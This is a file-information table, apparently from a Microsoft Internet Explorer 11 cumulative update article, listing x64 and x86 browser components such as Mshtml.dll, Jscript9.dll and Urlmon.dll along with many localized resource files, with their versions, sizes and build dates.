\nF12resources.dll.mui| 11.0.9600.17278| 62,464| 16-Aug-2014| 11:58| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 12:04| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 75,264| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 12:01| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,216| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 41,472| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 37,888| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 12:01| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 70,656| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 12:02| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,632| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 21-Nov-2019| 04:26| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 59,904| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 12:04| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,120| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 29,696| 16-Aug-2014| 12:03| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 11:58| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 11:59| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.17416| 77,824| 31-Oct-2014| 04:30| x64 \nDiagnosticshub.scriptedsandboxplugin.dll| 11.0.9600.18895| 276,480| 02-Jan-2018| 05:02| x64 \nUrlmon.dll.mui| 11.0.9600.18378| 46,080| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,712| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 54,272| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 45,056| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,936| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,424| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,200| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 20:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 21-Nov-2019| 04:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 20:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 20:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 20:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:20| Not applicable \nJsproxy.dll| 11.0.9600.17416| 54,784| 31-Oct-2014| 04:57| x64 \nWininet.dll| 11.0.9600.19572| 4,859,392| 19-Nov-2019| 19:26| x64 \nInetcpl.cpl.mui| 11.0.9600.18817| 114,176| 08-Sep-2017| 00:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 08-Sep-2017| 00:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 124,928| 08-Sep-2017| 00:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,880| 08-Sep-2017| 00:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,048| 08-Sep-2017| 00:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 138,240| 08-Sep-2017| 00:39| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 114,688| 08-Sep-2017| 00:38| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18666| 114,688| 16-Apr-2017| 09:49| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 131,584| 08-Sep-2017| 00:38| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 117,760| 08-Sep-2017| 00:39| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,368| 08-Sep-2017| 00:40| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 134,144| 08-Sep-2017| 00:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 107,008| 08-Sep-2017| 00:40| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 123,392| 14-Oct-2017| 09:53| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 127,488| 08-Sep-2017| 00:36| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,512| 08-Sep-2017| 00:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 88,064| 08-Sep-2017| 00:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 82,944| 14-Oct-2017| 09:53| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 08-Sep-2017| 00:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,392| 08-Sep-2017| 00:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 120,320| 08-Sep-2017| 00:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 08-Sep-2017| 00:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 08-Sep-2017| 00:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,952| 07-Sep-2017| 23:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 23:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,000| 07-Sep-2017| 23:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 23:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 23:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 23:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 21-Nov-2019| 04:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 121,856| 07-Sep-2017| 23:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 115,712| 07-Sep-2017| 23:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 23:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 23:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 74,752| 07-Sep-2017| 23:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 08-Sep-2017| 00:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 08-Sep-2017| 00:17| Not applicable \nIeui.dll| 11.0.9600.19463| 615,936| 27-Aug-2019| 03:17| x64 \nIedkcs32.dll| 18.0.9600.19541| 381,952| 24-Oct-2019| 02:53| x64 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 17:27| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 24-Sep-2013| 02:22| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 800,768| 19-Nov-2019| 19:04| x64 \nIepeers.dll| 11.0.9600.19507| 145,408| 06-Oct-2019| 03:17| x64 \nLicmgr10.dll| 11.0.9600.17416| 33,280| 31-Oct-2014| 04:40| x64 \nTdc.ocx| 11.0.9600.18666| 87,552| 16-Apr-2017| 08:10| x64 \nDiagnosticshub.datawarehouse.dll| 11.0.9600.18895| 666,624| 02-Jan-2018| 05:32| x64 \nIedvtool.dll| 11.0.9600.19541| 950,784| 24-Oct-2019| 04:07| x64 \nDiagnosticshub_is.dll| 11.0.9600.17416| 49,664| 31-Oct-2014| 05:13| x64 \nDxtmsft.dll| 11.0.9600.18895| 489,984| 02-Jan-2018| 05:06| x64 \nDxtrans.dll| 11.0.9600.19507| 315,392| 06-Oct-2019| 03:17| x64 \nEscmigplugin.dll| 11.0.9600.19326| 123,904| 26-Mar-2019| 05:38| x64 \nEscunattend.exe| 11.0.9600.19326| 87,040| 26-Mar-2019| 05:54| x64 \nMicrosoft-windows-ie-f12-provider.ptxml| Not applicable| 11,892| 15-Aug-2014| 22:51| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:00| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 03:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:59| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:58| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:04| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:01| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:01| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:01| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:02| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:04| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:01| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:04| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 21-Nov-2019| 04:24| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 12:03| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:58| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:58| Not applicable \nDiagnosticstap.dll| 11.0.9600.18895| 244,224| 02-Jan-2018| 05:04| x64 \nF12resources.dll| 11.0.9600.17496| 10,949,120| 22-Nov-2014| 03:00| x64 \nF12tools.dll| 11.0.9600.19507| 372,224| 06-Oct-2019| 03:26| x64 \nF12.dll| 11.0.9600.19507| 1,421,312| 06-Oct-2019| 03:14| x64 \nMsfeeds.dll| 11.0.9600.19572| 809,472| 19-Nov-2019| 19:41| x64 \nMsfeeds.mof| Not applicable| 1,518| 06-Feb-2014| 05:54| Not applicable \nMsfeedsbs.dll| 11.0.9600.17416| 60,416| 31-Oct-2014| 04:24| x64 \nMsfeedsbs.mof| Not applicable| 1,574| 22-Aug-2013| 06:54| Not applicable \nMsfeedssync.exe| 11.0.9600.17416| 12,800| 31-Oct-2014| 05:08| x64 \nMshta.exe| 11.0.9600.17416| 13,824| 31-Oct-2014| 05:12| x64 \nMshtmled.dll| 11.0.9600.19507| 92,160| 06-Oct-2019| 03:19| x64 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 06-Feb-2014| 05:41| Not applicable \nMshtml.dll| 11.0.9600.19572| 25,753,088| 19-Nov-2019| 20:56| x64 \nMshtml.tlb| 11.0.9600.16518| 2,724,864| 06-Feb-2014| 11:30| Not applicable \nIeadvpack.dll| 11.0.9600.17416| 132,096| 31-Oct-2014| 04:54| x64 \nIeetwcollector.exe| 11.0.9600.18895| 116,224| 02-Jan-2018| 05:17| x64 \nIeetwcollectorres.dll| 11.0.9600.16518| 4,096| 06-Feb-2014| 11:30| x64 \nIeetwproxystub.dll| 11.0.9600.18895| 48,640| 02-Jan-2018| 05:28| x64 \nIelowutil.exe| 11.0.9600.17416| 222,720| 31-Oct-2014| 04:55| x64 \nIeproxy.dll| 11.0.9600.19541| 805,376| 24-Oct-2019| 02:13| x64 \nIeshims.dll| 11.0.9600.19404| 386,560| 10-Jul-2019| 02:24| x64 \nIexpress.exe| 11.0.9600.17416| 167,424| 31-Oct-2014| 05:10| x64 \nWextract.exe| 11.0.9600.17416| 143,872| 31-Oct-2014| 05:12| x64 \nImgutil.dll| 11.0.9600.17416| 51,200| 31-Oct-2014| 03:42| x64 \nBing.ico| Not applicable| 5,430| 24-Sep-2013| 02:51| Not applicable \nIeunatt.exe| 11.0.9600.17416| 144,384| 31-Oct-2014| 04:51| x64 \nMicrosoft-windows-ie-internetexplorer-ppdlic.xrm-ms| Not applicable| 2,956| 21-Nov-2019| 03:23| Not applicable \nWindows feed discovered.wav| Not applicable| 19,884| 24-Sep-2013| 03:25| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 24-Sep-2013| 03:25| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 24-Sep-2013| 03:25| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 24-Sep-2013| 03:25| Not applicable \nJsdbgui.dll| 11.0.9600.19404| 591,360| 10-Jul-2019| 03:12| x64 \nJsprofilerui.dll| 11.0.9600.18895| 628,736| 02-Jan-2018| 04:56| x64 \nMemoryanalyzer.dll| 11.0.9600.19178| 1,862,144| 12-Oct-2018| 01:58| x64 \nMshtmldac.dll| 11.0.9600.19507| 88,064| 06-Oct-2019| 03:46| x64 \nNetworkinspection.dll| 11.0.9600.19507| 1,217,024| 06-Oct-2019| 03:15| x64 \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 14:43| Not applicable \nOccache.dll| 11.0.9600.17416| 152,064| 31-Oct-2014| 04:19| x64 \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 14:44| Not applicable \nWebcheck.dll| 11.0.9600.19541| 262,144| 24-Oct-2019| 02:55| x64 \nMsdbg2.dll| 12.0.41202.0| 403,592| 30-Sep-2014| 23:01| x64 \nPdm.dll| 12.0.41202.0| 579,192| 30-Sep-2014| 23:01| x64 \nPdmproxy100.dll| 12.0.41202.0| 107,152| 30-Sep-2014| 23:01| x64 \nIcrav03.rat| Not applicable| 8,798| 24-Sep-2013| 02:32| Not applicable \nMsrating.dll| 11.0.9600.18895| 199,680| 02-Jan-2018| 04:56| x64 \nTicrf.rat| Not applicable| 1,988| 24-Sep-2013| 02:32| Not applicable \nIertutil.dll| 11.0.9600.19541| 2,910,720| 24-Oct-2019| 03:43| x64 \nIe4uinit.exe| 11.0.9600.19541| 728,064| 24-Oct-2019| 02:53| x64 \nIernonce.dll| 11.0.9600.17416| 34,304| 31-Oct-2014| 04:56| x64 \nIesetup.dll| 11.0.9600.17416| 66,560| 31-Oct-2014| 05:06| x64 \nInseng.dll| 11.0.9600.19101| 107,520| 19-Jul-2018| 04:03| x64 \nIesysprep.dll| 11.0.9600.17416| 111,616| 31-Oct-2014| 04:29| x64 \nTimeline.dll| 11.0.9600.17905| 219,136| 15-Jun-2015| 22:01| x64 \nTimeline.cpu.xml| Not applicable| 3,197| 24-Jul-2014| 18:58| Not applicable \nTimeline_is.dll| 11.0.9600.17416| 171,008| 31-Oct-2014| 04:56| x64 \nVgx.dll| 11.0.9600.19507| 1,018,368| 06-Oct-2019| 03:19| x64 \nUrl.dll| 11.0.9600.17416| 237,568| 31-Oct-2014| 05:06| x64 \nIeframe.dll.mui| 11.0.9600.19541| 2,066,432| 24-Oct-2019| 05:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,120,704| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,063,360| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,313,728| 24-Oct-2019| 05:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,390,016| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,033,664| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,032,640| 24-Oct-2019| 04:29| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,584| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,255,360| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,061,312| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,325,504| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,019,840| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,070,528| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,082,304| 24-Oct-2019| 05:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,072| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,170,368| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,153,984| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,291,712| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,283,520| 24-Oct-2019| 05:43| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,051,584| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,301,440| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,093,056| 24-Oct-2019| 05:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,298,880| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,094,080| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,316,800| 24-Oct-2019| 13:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,305,024| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,286,080| 21-Nov-2019| 04:26| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,059,776| 24-Oct-2019| 13:42| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,315,264| 24-Oct-2019| 05:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 05:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,324,480| 24-Oct-2019| 05:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,098,176| 24-Oct-2019| 05:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 05:39| Not applicable \nIeframe.dll| 11.0.9600.19572| 15,445,504| 19-Nov-2019| 19:36| x64 \nIeframe.ptxml| Not applicable| 24,486| 06-Feb-2014| 05:41| Not applicable \nIeinstal.exe| 11.0.9600.18639| 492,032| 25-Mar-2017| 17:20| x64 \nInetres.adml| Not applicable| 523,798| 24-Oct-2019| 05:36| Not applicable \nInetres.adml| Not applicable| 497,168| 24-Oct-2019| 05:38| Not applicable \nInetres.adml| Not applicable| 549,601| 24-Oct-2019| 05:38| Not applicable \nInetres.adml| Not applicable| 938,813| 24-Oct-2019| 05:41| Not applicable \nInetres.adml| Not applicable| 455,538| 24-Oct-2019| 04:29| Not applicable \nInetres.adml| Not applicable| 541,364| 24-Oct-2019| 05:40| Not applicable \nInetres.adml| Not applicable| 523,828| 24-Oct-2019| 05:41| Not applicable \nInetres.adml| Not applicable| 573,051| 24-Oct-2019| 05:39| Not applicable \nInetres.adml| Not applicable| 567,797| 24-Oct-2019| 05:42| Not applicable \nInetres.adml| Not applicable| 545,645| 24-Oct-2019| 05:44| Not applicable \nInetres.adml| Not applicable| 635,718| 24-Oct-2019| 05:42| Not applicable \nInetres.adml| Not applicable| 522,947| 24-Oct-2019| 05:43| Not applicable \nInetres.adml| Not applicable| 486,171| 24-Oct-2019| 05:44| Not applicable \nInetres.adml| Not applicable| 546,070| 24-Oct-2019| 05:43| Not applicable \nInetres.adml| Not applicable| 556,258| 24-Oct-2019| 05:43| Not applicable \nInetres.adml| Not applicable| 532,548| 24-Oct-2019| 13:41| Not applicable \nInetres.adml| Not applicable| 539,045| 24-Oct-2019| 13:42| Not applicable \nInetres.adml| Not applicable| 799,803| 24-Oct-2019| 13:41| Not applicable \nInetres.adml| Not applicable| 501,599| 24-Oct-2019| 13:41| Not applicable \nInetres.adml| Not applicable| 518,930| 24-Oct-2019| 05:39| Not applicable \nInetres.adml| Not applicable| 418,138| 24-Oct-2019| 05:41| Not applicable \nInetres.adml| Not applicable| 434,747| 24-Oct-2019| 05:38| Not applicable \nInetres.adml| Not applicable| 434,747| 24-Oct-2019| 05:38| Not applicable \nInetres.admx| Not applicable| 1,675,975| 24-Oct-2019| 00:28| Not applicable \nInetcomm.dll| 6.3.9600.19572| 1,033,216| 19-Nov-2019| 19:49| x64 \nInetres.dll| 6.3.9600.16384| 84,480| 22-Aug-2013| 11:43| x64 \nJscript9.dll| 11.0.9600.19572| 5,500,928| 19-Nov-2019| 20:17| x64 \nJscript9diag.dll| 11.0.9600.19101| 814,080| 19-Jul-2018| 04:21| x64 \nJscript.dll| 5.8.9600.19572| 797,184| 19-Nov-2019| 20:18| x64 \nVbscript.dll| 5.8.9600.19573| 580,096| 21-Nov-2019| 02:16| x64 \nIexplore.exe| 11.0.9600.19036| 817,296| 25-May-2018| 05:24| x86 \nHtml.iec| 2019.0.0.18895| 341,504| 02-Jan-2018| 04:51| Not applicable \nIeui.dll| 11.0.9600.18895| 476,160| 02-Jan-2018| 04:44| x86 \nIepeers.dll| 11.0.9600.19507| 128,000| 06-Oct-2019| 02:56| x86 \nTdc.ocx| 11.0.9600.18666| 73,216| 16-Apr-2017| 07:29| x86 \nDxtmsft.dll| 11.0.9600.18895| 416,256| 02-Jan-2018| 04:34| x86 \nDxtrans.dll| 11.0.9600.19507| 279,040| 06-Oct-2019| 02:56| x86 \nMsfeeds.dll| 11.0.9600.19572| 696,320| 19-Nov-2019| 07:23| x86 \nMsfeeds.mof| Not applicable| 1,518| 06-Feb-2014| 05:53| Not applicable \nMshta.exe| 11.0.9600.17416| 12,800| 31-Oct-2014| 03:28| x86 \nMshtmled.dll| 11.0.9600.19404| 76,288| 10-Jul-2019| 02:48| x86 \nMshtml.dll| 11.0.9600.19572| 20,290,048| 19-Nov-2019| 08:17| x86 \nMshtml.tlb| 11.0.9600.16518| 2,724,864| 06-Feb-2014| 10:20| Not applicable \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 06-Feb-2014| 05:43| Not applicable \nIeetwproxystub.dll| 11.0.9600.17416| 47,616| 31-Oct-2014| 03:23| x86 \nIeunatt.exe| 11.0.9600.17416| 115,712| 31-Oct-2014| 03:12| x86 \nOccache.dll| 11.0.9600.17416| 130,048| 31-Oct-2014| 02:48| x86 \nWebcheck.dll| 11.0.9600.19541| 230,400| 24-Oct-2019| 02:33| x86 \nIernonce.dll| 11.0.9600.17416| 30,720| 31-Oct-2014| 03:15| x86 \nIesetup.dll| 11.0.9600.17416| 62,464| 31-Oct-2014| 03:24| x86 \nIesysprep.dll| 11.0.9600.17416| 90,624| 31-Oct-2014| 02:56| x86 \nIe9props.propdesc| Not applicable| 2,843| 24-Sep-2013| 02:34| Not applicable \nIeframe.dll| 11.0.9600.19572| 13,838,336| 19-Nov-2019| 07:20| x86 \nWow64_ieframe.ptxml| Not applicable| 24,486| 06-Feb-2014| 05:43| Not applicable \nJscript9.dll| 11.0.9600.19572| 4,112,384| 19-Nov-2019| 07:26| x86 \nJscript9diag.dll| 11.0.9600.19101| 620,032| 19-Jul-2018| 03:54| x86 \nJscript.dll| 5.8.9600.19572| 662,528| 19-Nov-2019| 07:49| x86 \nVbscript.dll| 5.8.9600.19573| 496,640| 21-Nov-2019| 02:16| x86 \nActxprxy.dll| 6.3.9600.19301| 1,049,600| 26-Feb-2019| 06:20| x86 \nHlink.dll| 6.3.9600.19101| 99,328| 19-Jul-2018| 03:55| x86 \nPngfilt.dll| 11.0.9600.17416| 57,344| 31-Oct-2014| 03:26| x86 \nUrlmon.dll| 11.0.9600.19572| 1,331,712| 19-Nov-2019| 07:01| x86 \nWininetplugin.dll| 6.3.9600.17416| 35,328| 31-Oct-2014| 03:12| x86 